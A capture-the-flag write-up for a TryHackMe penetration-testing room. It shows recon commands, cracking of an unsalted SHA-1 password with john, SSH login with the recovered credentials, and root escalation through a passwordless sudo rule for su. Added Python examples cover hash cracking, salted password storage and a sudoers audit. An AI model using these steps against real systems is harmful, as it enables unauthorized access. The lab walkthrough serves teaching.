THM: Crash Course Pen Testing

Write-up for the final challenge of the CC: Pen Testing room at TryHackMe

Basic Information

Type: Regular Box
Name: Try Hack Me / CC: Pen Testing
URL: tryhackme.com/room/ccpentesting
Author: Asentinn / OkabeRintaro (https://ctftime.org/team/152207)

Contents

  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges

Recon

The target IP is 10.10.113.202; I'm assigning it to a shell variable for ease of use.

$ IP=10.10.113.202

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out

[screenshot: nmap output]

Then prepare XML input for searchsploit by rescanning only the open ports (22 and 80):

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-10.10.113.202.xml

[screenshot: searchsploit output]

Firing up nikto and ffuf for practice:

$ nikto -h $IP -o nikto-$IP.txt

[screenshot: nikto output]

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md

The ffuf command line can be a little complicated, so let me explain the options:

  • -w: wordlist for fuzzing; the :FUZZ suffix names the keyword that is substituted into the URL
  • -u: target URL, with FUZZ marking where each wordlist entry is inserted
  • -recursion, -recursion-depth: when ffuf finds a directory, it queues another scan of it that starts after the current one finishes (you will recognize it by the Job [1/X] label)
  • -e: a useful one; it simultaneously looks for files with the listed extensions. Be careful with it though, as it multiplies the amount of work by N, where N is the number of extensions (for each wordlist entry it also tries appending each of them).
  • -v: shows the full URL of each finding (useful together with the -recursion flag)
  • -of: output format; ffuf output files are not the easiest to read, and I chose Markdown for now
  • -o: the name of the output file; the shell expands $IP into the address, so the result is fuzz-10.10.113.202.md

[screenshot: ffuf output]

Cracking user password

Both tools found the /secret/ directory, and ffuf went on to find /secret/secret.txt.

$ curl http://10.10.200.35/secret/secret.txt

[screenshot: contents of secret.txt]

This is clearly a hash of a user password. I will crack it with john, which could simply be run blindly on that file, but let's first run it through hash-identifier (shipped with Kali) to see what it reports, just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8

[screenshot: hash-identifier output]

As we can see, it is a SHA-1 hash. Now let's crack it with john:

$ john -format=Raw-SHA1 secret.txt

[screenshot: john output]
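To make the hash-identifier and john steps above concrete, here is an added example (my own code, not from the room or the write-up author) that does three things: guesses a digest family from its length the way hash-identifier does, shows why a dictionary attack on an unsalted SHA-1 is one cheap hash call per candidate, and then shows the storage scheme that would have made this step slow and salt-specific (PBKDF2-HMAC-SHA256 with a random salt; the iteration count is an assumption for the example). The wordlist and the target digest are constructed inline.

```python
import hashlib
import hmac
import os
import re

# Hex digest length is the only thing a tool like hash-identifier has to go on for
# an unsalted, unprefixed hash, so every guess below is ambiguous by design.
DIGEST_LENGTHS = {
    32: "MD5 / NTLM (128-bit)",
    40: "SHA-1 / RIPEMD-160 (160-bit)",
    56: "SHA-224",
    64: "SHA-256 / SHA3-256",
    96: "SHA-384",
    128: "SHA-512 / SHA3-512",
}


def identify_hash(digest):
    """Return a length-based guess at the digest family, or None if it is not plain hex."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return None
    return DIGEST_LENGTHS.get(len(digest))


def dictionary_attack_sha1(target_hex, wordlist):
    """Unsalted SHA-1 costs one hashlib call per candidate, which is why john finishes
    in well under a second on a short wordlist. Returns the matching word or None."""
    target = target_hex.lower()
    for word in wordlist:
        if hashlib.sha1(word.encode()).hexdigest() == target:
            return word
    return None


# --- The defensive side: how the same password should have been stored ---
PBKDF2_ITERATIONS = 200_000  # assumption for the example; tune to your hardware budget


def store_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex' using a fresh random salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the record from its own salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown record format")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed demo data: a tiny wordlist and a target digest built from one of its entries.
DEMO_WORDLIST = ["password", "letmein", "123456", "nyan", "correcthorsebatterystaple"]
DEMO_TARGET = hashlib.sha1(b"nyan").hexdigest()

if __name__ == "__main__":
    print("family guess:", identify_hash("046385855FC9580393853D8E81F240B66FE9A7B8"))
    print("cracked:", dictionary_attack_sha1(DEMO_TARGET, DEMO_WORDLIST))
    rec = store_password("nyan")
    print("stored as:", rec)
    print("verify right/wrong:", verify_password("nyan", rec), verify_password("nyaan", rec))
```

The point of the last two functions is the contrast: with a per-user random salt, a precomputed table is useless, and with a high iteration count each candidate costs hundreds of thousands of hash calls instead of one, so the same wordlist that john exhausts instantly against raw SHA-1 becomes expensive per account.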

John cracked it almost instantly (never use such weak passwords, of course). So we've got the credentials nyan/nyan. Let's try logging in over SSH with them:

$ ssh nyan@$IP

[screenshot: SSH login]

We're in. Now I'm grabbing the user flag:

nyan@ubuntu:~$ cat user.txt

Elevating privileges

[screenshot: sudo -l output]

User nyan can run /bin/su as root without supplying a password.

Just by seeing this sudoers entry we know that nyan is allowed to execute the sudo command at all.

Otherwise, running sudo -l would print Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the host name).
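From the defender's side, the entry sudo -l showed is exactly the kind of rule a sudoers audit should flag: a NOPASSWD grant for a command that hands over a root shell. The following is an added example (my own code, not from the room) that parses a simplified sudoers grammar and reports such grants. The sudoers excerpt is constructed for the example; the nyan line is my assumed rendering of what the box's rule would look like in /etc/sudoers, and the set of shell-granting binaries is an assumption to extend for your environment.

```python
import re

# Constructed sudoers excerpt for this example. The nyan line is an assumed rendering
# of the rule sudo -l reported on the box (run /bin/su as root, no password prompt).
SAMPLE_SUDOERS = """\
Defaults        env_reset
# User privilege specification
root    ALL=(ALL:ALL) ALL
nyan    ALL=(root) NOPASSWD: /bin/su
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app.service
backup  ALL=(root) /usr/bin/rsync
"""

# Commands that hand the caller a root shell outright; a NOPASSWD rule for any of
# these is a full root grant whatever the intent. Assumed list, extend as needed.
SHELL_GRANTING = {"ALL", "/bin/su", "/usr/bin/su", "/bin/sh", "/bin/bash",
                  "/usr/bin/sh", "/usr/bin/bash"}

# Simplified sudoers user specification: user host=(runas) [TAG: ...] cmd[, cmd...]
# (aliases, Defaults lines and the "host=cmd" form without parentheses are skipped).
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per user-specification line; comments and other lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line else None
        if not m:
            continue
        rules.append({
            "user": m["user"],
            "host": m["host"],
            # (ALL:ALL) carries user:group; only the target user matters here.
            # An empty runas means root, which is the sudoers default.
            "runas": m["runas"].split(":")[0] or "root",
            "tags": {t.rstrip(":") for t in m["tags"].split()},
            "commands": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules


def passwordless_root_shells(text):
    """List (user, command) pairs that yield a root shell with no password prompt."""
    findings = []
    for rule in parse_sudoers(text):
        if "NOPASSWD" not in rule["tags"] or rule["runas"] not in ("root", "ALL"):
            continue
        for cmd in rule["commands"]:
            binary = cmd.split()[0]  # first token is the program; the rest are arguments
            if binary in SHELL_GRANTING:
                findings.append((rule["user"], cmd))
    return findings


if __name__ == "__main__":
    for user, cmd in passwordless_root_shells(SAMPLE_SUDOERS):
        print(f"{user}: passwordless root shell via {cmd!r}")
```

On the sample data only the nyan rule is reported: root's rule has no NOPASSWD tag, deploy's passwordless command is not a shell, and backup still has to authenticate. The same check run over a fleet's sudoers files (or over collected sudo -l output) is a cheap way to catch this misconfiguration before a cracked SSH password turns into root.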

We've got root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt